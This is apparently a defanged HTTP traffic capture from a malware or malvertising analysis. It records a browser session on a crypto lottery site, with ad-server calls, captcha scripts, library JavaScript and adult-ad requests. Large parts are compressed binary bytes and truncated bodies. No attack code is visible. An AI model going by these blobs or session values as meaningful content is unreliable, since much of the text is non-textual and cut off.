..I......'.=....$..M..h.. .5<.5.R..D.m.6%E,3.t.. '..,........e..m..
.......*d..4R...O..K>XIf...z}...?J.].B-y..;R.....Q.Bk....p..-7f0.K@
..u....R.....7.....- .....!.dF.GU...H..B4.t..". ...y8{....G...(.._F..p
.9.toa...tA ).Y.VNkn4:"x..C.B.H.. ...o..J...$...:..S..jfWk....`mH..k..
*~.~Jc..|x.\..F.M...L.*...F.s.W.~............0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=VQY6CNGEKEK2J HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17b............}R]O.0.}...}.....L.....b..B..tm...uY. .......J_..{..=.u
h.i.8h.h,.h....M".lr.c._@.1....K...j.A..........r&..........].........
..@.B..(P..(d.@..`...}...S/..D.e?. Y......CI.Bk....h..m7f.P ..f...u/.F
..............\....U...uJ.0..zMx..........{.~.8..G.....u..^&.....|..Z.
d.^I....r.H0...Ej...(a.C.\.M>Y...@S.!....>..A.v....n...b......g.
.4.O....UHk..4.{..W.....~..J..............0..HTTP/1.1 200 OK..Server: 
nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:18 GMT..Content-Typ
e: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Po
wered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17b..........
..}R]O.0.}...}.....L.....b..B..tm...uY. .......J_..{..=.uh.i.8h.h,.h..
..M".lr.c._@.1....K...j.A..........r&..........]...........@.B..(P..(d
.@..`...}...S/..D.e?. Y......CI.Bk....h..m7f.P ..f...u/.F.............
.\....U...uJ.0..zMx..........{.~.8..G.....u..^&.....|..Z.d.^I....r.H0.
..Ej...(a.C.\.M>Y...@S.!....>..A.v....n...b......g..4.O....UHk..
4.{..W.....~..J..............0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=QP10TX6B6KV66 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17d............}R]O. .}..@.|.eNS..51.1..%........B......m.u.q.....{...
.&.".l.N9a.q{..*.......K....... ...K......(..S..".."i....-..E..u,K.K..
...j..Z.!m..g..9.,.3i.n.....~.I:.R9.%XoH~5.1..:..4F.a..oWn.`&..fD...qO
...06,nB..g..A...3..Q)..<*sD.F:..D3Ag.J.=.G/......?...y.N........pz
=...r.%..Xau:9...h..}....aD".....}..P......n.4........Z?....Pj...Bu...
T....h7..i. .f3..x]..).....T..?l.........0..HTTP/1.1 200 OK..Server: n
ginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:34 GMT..Content-Type
: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Pow
ered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17d...........
.}R]O. .}..@.|.eNS..51.1..%........B......m.u.q.....{....&.".l.N9a.q{.
.*.......K....... ...K......(..S..".."i....-..E..u,K.K.....j..Z.!m..g.
.9.,.3i.n.....~.I:.R9.%XoH~5.1..:..4F.a..oWn.`&..fD...qO...06,nB..g..A
...3..Q)..<*sD.F:..D3Ag.J.=.G/......?...y.N........pz=...r.%..Xau:9
...h..}....aD".....}..P......n.4........Z?....Pj...Bu...T....h7..i. .f
3..x]..).....T..?l.........0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=DNXGITSPBPYNI HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17b............}R]O. .}..@.|.e......3f.Y6..}2.X!kKSp...wi.....B...s9..
,L.....,8a.qW.f.p`.9... .......K. .).......|..W..0&..>...6.f.i.6.*.
/,..?......Heg.<!F.xw)..>...S...D../...`.%.......5..aX.....3....
..:...gR.....7......!.....!.dF.GU...H..D4.t..".#Ao...........e..n&...i
.q:.....9..VR,.:....ht@.b9..........F_$3.h..$...:u.)c{=..5..wk.6$....P
.?a..1xl>.O.BZ#..Y..D.j...F.s.W.~./.`[.......0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=9GMQOGUXRJ58I HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17d............}R]O. .}..@.|..D]jG..........P`..-M.}.......#.....s.9.`
a.4r.fa.....kmV).fU....4.j..q-.....b ..H..<...._..d.4..m....2K.:V%.
.....z5.PZ..l.....9./$3"..=.v=..SEg.Ps^.....&=.`T....h?,\..........h.B
;...0....M.....3.D..!D.*...Q.!.4.B-.M%.y.(.Hx;x.........x....=.j.<.
.N.|..*'].Z..V........^"....#.9..u......m..I..FNs.......Z...5.....:@..
.....<4..&W#..d.l.:..K.?.Q.........:........0..HTTP/1.1 200 OK..Ser
ver: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:35 GMT..Conten
t-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive.
.X-Powered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17d.....
.......}R]O. .}..@.|..D]jG..........P`..-M.}.......#.....s.9.`a.4r.fa.
....kmV).fU....4.j..q-.....b ..H..<...._..d.4..m....2K.:V%......z5.
PZ..l.....9./$3"..=.v=..SEg.Ps^.....&=.`T....h?,\..........h.B;...0...
.M.....3.D..!D.*...Q.!.4.B-.M%.y.(.Hx;x.........x....=.j.<..N.|..*'
].Z..V........^"....#.9..u......m..I..FNs.......Z...5.....:@.......<
;4..&W#..d.l.:..K.?.Q.........:........0..

GET /get.php?callback=gtcallback HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 2778

Connection: keep-alive

Etag: "31b67ea84f8d1f83124ad7a043f831f08280500f"

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0
.(function () {.    var head = document.getElementsByTagName('head')[0
];.    var loadJS = function (url, callback) {.        var s = documen
t.createElement('script');.        var loaded = false;.        var onl
oad = function () {.            if (!loaded &&.                (!s.rea
dyState.                    || "loaded" === s.readyState.             
       || "complete" === s.readyState)) {.                loaded = tru
e;..                // setTimeout for IE10-.                setTimeout
(function () {.                    callback(false);.                },
 0);.            }.        };.        var onerror = function () {.    
        callback(true);.        };.        s.charset = 'UTF-8';.      
  s.id = 'gt_lib';.        s.async = false;.        s.onload = s.onrea
dystatechange = onload;.        s.onerror = onerror;.        s.src = u
rl;.        head.appendChild(s);.    };.    var normalizeDomain = func
tion (domain) {.        // return domain.replace(/^https?:\/\/|\/.*$/g
, '');.        return domain.replace(/^https?:\/\/|\/$/g, '');.    };.
    var normalizePath = function (path) {.        path = path.replace(
/\/ /g, '/');.        if (path.indexOf('/') !== 0) {.            path 
= '/'   path;.        }.        return path;.    };.    var makeURL = 
function (protocol, domain, path) {.        domain = normalizeDomain(d
omain);.        var url = normalizePath(path);.        if (domain) {. 
           url = protocol   domain   url;.        }.        return url
;.    };..    var load = function (protocol, domains, path, callba<<< skipped >>>

GET /refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ecii&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143579 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:36 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 352

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache, no-store, must-revalidate

Etag: "28c62a0b8c67df865053052b6a21a6d97cc68435"

Expires: 0

geetest_1484906143579({"fullbg": "pictures/gt/d0fe39770/d0fe39770.jpg"
, "slice": "pictures/gt/d0fe39770/slice/f1725fe8.png", "feedback": "ht
tp://VVV.geetest.com/contact#report", "bg": "pictures/gt/d0fe39770/bg/
f1725fe8.jpg", "id": "", "challenge": "70635a5a34b073f557c9bcaabf1c81e
c6q", "link": "", "type": "slide", "ypos": 0, "height": 116, "xpos": 0
})HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:36 GMT.
.Content-Type: text/javascript;charset=UTF-8..Content-Length: 352..Con
nection: keep-alive..Pragma: no-cache..Cache-Control: no-cache, no-sto
re, must-revalidate..Etag: "28c62a0b8c67df865053052b6a21a6d97cc68435".
.Expires: 0..geetest_1484906143579({"fullbg": "pictures/gt/d0fe39770/d
0fe39770.jpg", "slice": "pictures/gt/d0fe39770/slice/f1725fe8.png", "f
eedback": "hXXp://VVV.geetest.com/contact#report", "bg": "pictures/gt/
d0fe39770/bg/f1725fe8.jpg", "id": "", "challenge": "70635a5a34b073f557
c9bcaabf1c81ec6q", "link": "", "type": "slide", "ypos": 0, "height": 1
16, "xpos": 0})..

GET /index.php?s=/lottery/index/index.html HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: ThinkPHP

Set-Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: private

Pragma: no-cache

Content-Encoding: gzip
22ee.............]{s.U..{S.wh...`=.~.....C.....M.ZR[.DR.u ..T1@...ax.0
C....f...2L......e;..W......V.$.N.j7...}...{......|.........CKG.L=.g..
T............Z...m..F..J|42..?.9N-n<.0.g#O.OM.g.JMw.\..hy...U.Y....
..Z{.L:.S6.......N.2.Z\....c''....{4..3.`<.=.0.x.....9.T7V....F.l..
x...6}&....F9.....a........;%.b....L...zH....Y....c\p..v.|C9k'.hE/V...
M~...Z.......I;_7k.f..-L...g.F}-.I.....YM..#S.I^.UE5....y.?.....*.e%..
...........0...Mj.X..R...l....8.:.....q,.v...n...7..^/.....$.a..G.....
.5_{s..W..*.....{^.kK%P..C....jV..j.=...9.............k.d......_o..o..
.....J.....`.m......R........V....#..."_5..(|....o.....*...........-..
_l^~....n~.g.............F....H.L.R.....L.^....S z...e.T....V...s.3...
..M.?..?..y.:g...7 f1."..va^..G...U{...l[.....e.....K.....i...[.\.;ql.
P.S..S..._..U..Y..R.C\.....2..".......o.........w9...={......W..].....
[.....O......d;......Y.,"A.w..f...._.e..5l.......2!.8gk.s..W.8.R.kV...
/.4{..g.7~l....kW......o4.|....m]}c.w.n.wC....(..-~.e.0J..x.cM..J"_}..
D.@9;..t.8M..a{....da..5.}.~....;...b...C.y..|.Ij.........)6D.#......y
.....^j^.....q..2..e.........A..G..N..[>6}t..9b9..L.1=K.I.f.Ky9.xl.
...#s'X......Y5.c..u:...a...I..g...\....z..y....E...........:V-.O..l..
..d.........?*P..j.D.|.T......Y-.;....[..#.T.g\...7.....l......F.....(
.k...F.9 .9.v....|.G.....w....m.............7.j.......W.Y.........._..
..~.O....S[R.y.9....=j....w^..J...yC...^>g...V.9........Vv..9m...,.
.5..che..h.o..W.F........EL@..dU..Td.i...uC...Em.,......f5.....0R...Yy
.........G3m.1 ..X...9.....\Y..... )!.....?..Kz... .D.....oh...S..<<< skipped >>>

GET /Public/zui/css/zui.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Thu, 27 Aug 2015 15:47:32 GMT

ETag: "a5a4f0-2bdf4-51e4ce29f6d00"

Content-Encoding: gzip
7824..............k.#.. .]f..P....i...P..5.4......gv.....5K.......P...
...xx...GdfU5I.DH.@f<<<<<<<...W....._....~7...OF.
...L...p<.N.....r........s...}......\..wgx...l...e.........b ......
....}.\.o._....C..)hj.......p.W.?|.'S.._..........}=X6 ...i.>5...6.
.|9U.....x4.,>.~........v.jF.7.C..j......>..|wX.bg..U}..~..aT...
..5...w...._:`.8.......m..G..y..06......[._0....:....N..rW..o....../.v
w.o....:^....x<..k.'..._m...4_.N.......)z....s..U...}u.4.......|.U.
...].|._~.....~\m...... ..{........P.e..Csy...9\N..../E.Cs....`S.....]
..o..U}..tv......kB..e.s/...p]..;...:.....]C....o.?./......1.V.}<C.
....,......../..-....`.a{.0W..E.|g0~X......cu......u.|<........m...
..b[a..f.....M......h.L.s.dt3......f...i......./.......9.....w..D.?28.
.P`.......T-...w.>......t..../]...?....E......p...p.l.D..(..5?...2.
`....(z..\6..t?x=.;D..{.^{.......X...]Z.j.T.m.....e.v....?A.C .....R.m
...<.~...0.7W.o......W..N..W.........^.:g`.t..I..4m^?.i|...........
.u.T&.e>s...h>e@..........XT.....|...x?..f8r......p4./.{O].K.a=.
.?X.q......Y..]..v.. \.......q..w.s}q/..je.lt...F7...h.`..h<....!Lf
e...v5x.....yW?.....=Y..,.a...n....e.;`...}......2.......3.I8}9.eX...A
.&.m.........r.5......6.m......O...W.. ....S.hO..%....u...:...z5..5g..
|<..R=6[..'....QU.].2....c..}..z]=.<..P...|..#...MO.I9...".J.$|J
.......z..-7%.>.....P.]\nV4@..q~..C. ..n...S..........T....f$.B#f..
{.p{8X9......x...L.z.4.R%_....r1D..Z..-..lb....:......?...:.....5,I...
G...z.}....D?R.=...$ "O.xI.=..[un...g`6.[|j.3x..I/.rX..e.c.f..1.eF<<< skipped >>>

GET /Public/js/com/com.talker.class.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: application/javascript

Connection: keep-alive

Last-Modified: Mon, 11 Jan 2016 11:56:26 GMT

ETag: "a5a24e-1eed-5290da0676e80"

Accept-Ranges: bytes

Content-Length: 7917
/**.. * .............. * ...................................... */..va
r talker = {..    'container': function () {..        return $('#talke
r');//talker DIV........    },..    show: function () {..        var c
ontainer = talker.container();..        if (container.text().trim() ==
 '') {..            toast.success('Start Chatting');..            toas
t.showLoading();..            $.get(U('Ucenter/Session/panel'), {},.. 
               function (html) {..                    container.html(h
tml);..                    talker.bind_ctrl_enter();..                
    toast.hideLoading()..                }..            );..        } 
else {..            container.toggle();..        }..    },..    /**.. 
    * ....................     * @param uid..     */..    start_talk: 
function (uid) {....        show_chat_frame(function(){..            c
reate_conv(uid);..        });../*..        $.post(U('Ucenter/Session/c
reateTalk'), {uids: uid}, function (msg) {..            if (msg.status
) {..                talker.show();..                talker.open(msg.i
nfo.id);..                *//*..............................*//*..    
            talker.prepend_session(msg.info);..            } else {.. 
               //TODO ..............            }..        }, 'json');
*/..    },..    /**..     * ................................     * @pa
ram html ..............     */..    append_message: function (html) {.
.        $('#scrollContainer_chat').append(html);..        $('#scrollA
rea_chat').slimScroll({scrollTo: $('#scrollContainer_chat').height<<< skipped >>>

GET /Public/zui/fonts/zenicon.eot? HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Origin: hXXp://coinsns.com

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: application/vnd.ms-fontobject

Connection: keep-alive

Last-Modified: Thu, 27 Aug 2015 15:47:32 GMT

ETag: "a5a4f7-13b58-51e4ce29f6d00"

Accept-Ranges: bytes

Content-Length: 80728

X;...:............................LP........................@..@......
..............Z.e.n.I.c.o.n.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .2...
1.....Z.e.n.I.c.o.n................0OS/2...].......`cmap..".........ga
sp............glyf..........-.head.;....0....6hhea. ....0....$hmtxF...
..1....4loca%.n...6<....maxp.b....8.... nameQ.'...8.....post......:
.... ...........L.f...G.L.f.........................................@.
........L...L............... .............................l.@...,... .
......#./.3.7.U.n.q.......................).4.=.G.L.Q.j.p.|...........
........................".3........... .........%.3.6.;.W.p.s.........
.............. .6.B.J.O.h.l.{...................................!.3...
........-...........................................................t.
......~.q.m.e.c.a.V.U.F.E.D.B./.(...L.................................
......................................................................
...............................79..................79.................
.79...........s.N.,..%....#"/...#"/.&54?.'&54?.632..7632...........s.'
....TT....'..TT..'....TT....'..TT.=..'..TT..'....TT....'..TT..'....TT.
..............D...........#"'&'&'&5476767632.5.........#"'&'&'&5476767
632..476?.632.........................................................
.....w.........................D.............................I........
..........7..%4'&#"......32765....#"/..#"'&'&'&5476767632.............
I%&55%&&U&%......b3?)%%........%%))%&....#b..5&%%&55%&&%5.....a#....
%%))%&........&%)?3b..............n. .P.e..%5.........#1"'&'&'&'&'

<<< skipped >>>

GET /Public/js.php?t=js&f=js/com/com.notify.class.js,static/qtip/jquery.qtip.js,js/ext/slimscroll/jquery.slimscroll.min.js,js/ext/magnific/jquery.magnific-popup.min.js,js/ext/placeholder/placeholder.js,js/ext/atwho/atwho.js,zui/js/zui.js&v=.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:17 GMT

Content-Type: application/x-javascript; charset: utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.14

cache-control: max-age=604800

Last-Modified: Fri, 20 Jan 2017 09:55:17GMT

Pragma: max-age=604800

Expires: Fri, 27 Jan 2017 09:55:17 GMT

Etag: 1484906117||L1B1YmxpYy9qcy5waHA/dD1qcyZmPWpzL2NvbS9jb20ubm90aWZ5LmNsYXNzLmpzLHN0YXRpYy9xdGlwL2pxdWVyeS5xdGlwLmpzLGpzL2V4dC9zbGltc2Nyb2xsL2pxdWVyeS5zbGltc2Nyb2xsLm1pbi5qcyxqcy9leHQvbWFnbmlmaWMvanF1ZXJ5Lm1hZ25pZmljLXBvcHVwLm1pbi5qcyxqcy9leHQvcGxhY2Vob2xkZXIvcGxhY2Vob2xkZXIuanMsanMvZXh0L2F0d2hvL2F0d2hvLmpzLHp1aS9qcy96dWkuanMmdj0uanM=
bd48..var Notify = {..    'readMessage': function (obj, message_id) {.
.        var url = $(obj).attr('data-url');..        if( url !=''){.. 
           toast.showLoading();..            $.post(U('Ucenter/Public/
readMessage'), {message_id: message_id}, function (msg) {..           
     toast.hideLoading();..                location.href = url;..     
       }, 'json');..        }..    },..    ..    'setAllReaded': funct
ion () {..        $.post(U('Ucenter/Public/setAllMessageReaded'), func
tion () {..            $hint_count.text(0);..            $('#nav_messa
ge').html('<div style="font-size: 18px;color: #ccc;font-weight: nor
mal;text-align: center;line-height: 150px">None!</div>');..  
          $nav_bandage_count.hide();..            $nav_bandage_count.t
ext(0);..        });..    }..};....(function( window, document, undefi
ned ) {..// Uses AMD or browser globals to create a jQuery plugin...(f
unction( factory ) {..."use strict";...if(typeof define === 'function'
 && define.amd) {....define(['jquery'], factory);...}...else if(jQuery
 && !jQuery.fn.qtip) {....factory(jQuery);...}..}..(function($) {..."u
se strict"; // Enable ECMAScript "strict" operation for this function.
 See more: hXXp://ejohn.org/blog/ecmascript-5-strict-mode-json-and-mor
e/..;// Munge the primitives - Paul Irish tip..var TRUE = true,..FALSE
 = false,..NULL = null,..// Common variables..X = 'x', Y = 'y',..WIDTH
 = 'width',..HEIGHT = 'height',..// Positioning sides..TOP = 'top',..L
EFT = 'left',..BOTTOM = 'bottom',..RIGHT = 'right',..CENTER = 'cen<<< skipped >>>

GET /index.php?s=/lottery/index/index.html HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: ThinkPHP

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: private

Pragma: no-cache

Content-Encoding: gzip
22ee.............]{s.U..{S.wh...`=.~.....C.....M.ZR[.DR.u ..T1@...ax.0
C....f...2L......e;..W......V.$.N.j7...}...{......|.........CKG.L=.g..
T............Z...m..F..J|42..?.9N-n<.0.g#O.OM.g.JMw.\..hy...U.Y....
..Z{.L:.S6.......N.2.Z\....c''....{4..3.`<.=.0.x.....9.T7V....F.l..
x...6}&....F9.....a........;%.b....L...zH....Y....c\p..v.|C9k'.hE/V...
M~...Z.......I;_7k.f..-L...g.F}-.I.....YM..#S.I^.UE5....y.?.....*.e%..
...........0...Mj.X..R...l....8.:.....q,.v...n...7..^/.....$.a..G.....
.5_{s..W..*.....{^.kK%P..C....jV..j.=...9.............k.d......_o..o..
.....J.....`.m......R........V....#..."_5..(|....o.....*...........-..
_l^~....n~.g.............F....H.L.R.....L.^....S z...e.T....V...s.3...
..M.?..?..y.:g...7 f1."..va^..G...U{...l[.....e.....K.....i...[.\.;ql.
P.S..S..._..U..Y..R.C\.....2..".......o.........w9...={......W..].....
[.....O......d;......Y.,"A.w..f...._.e..5l.......2!.8gk.s..W.8.R.kV...
/.4{..g.7~l....kW......o4.|....m]}c.w.n.wC....(..-~.e.0J..x.cM..J"_}..
D.@9;..t.8M..a{....da..5.}.~....;...b...C.y..|.Ij.........)6D.#......y
.....^j^.....q..2..e.........A..G..N..[>6}t..9b9..L.1=K.I.f.Ky9.xl.
...#s'X......Y5.c..u:...a...I..g...\....z..y....E...........:V-.O..l..
..d.........?*P..j.D.|.T......Y-.;....[..#.T.g\...7.....l......F.....(
.k...F.9 .9.v....|.G.....w....m.............7.j.......W.Y.........._..
..~.O....S[R.y.9....=j....w^..J...yC...^>g...V.9........Vv..9m...,.
.5..che..h.o..W.F........EL@..dU..Td.i...uC...Em.,......f5.....0R...Yy
.........G3m.1 ..X...9.....\Y..... )!.....?..Kz... .D.....oh...S..<<< skipped >>>

GET /index.php?s=/lottery/index/getlast.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: application/json; charset=utf-8

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 15

{"left_time":0}HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Fri, 20 Ja
n 2017 09:55:35 GMT..Content-Type: application/json; charset=utf-8..Co
nnection: keep-alive..X-Powered-By: PHP/5.3.14..Expires: Thu, 19 Nov 1
981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, 
post-check=0, pre-check=0..Pragma: no-cache..Content-Length: 15..{"lef
t_time":0}..

GET /ads?zone_id=1343911&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1689

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=32fa73d3-9003-473d-a39a-6a2fa13bac12; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
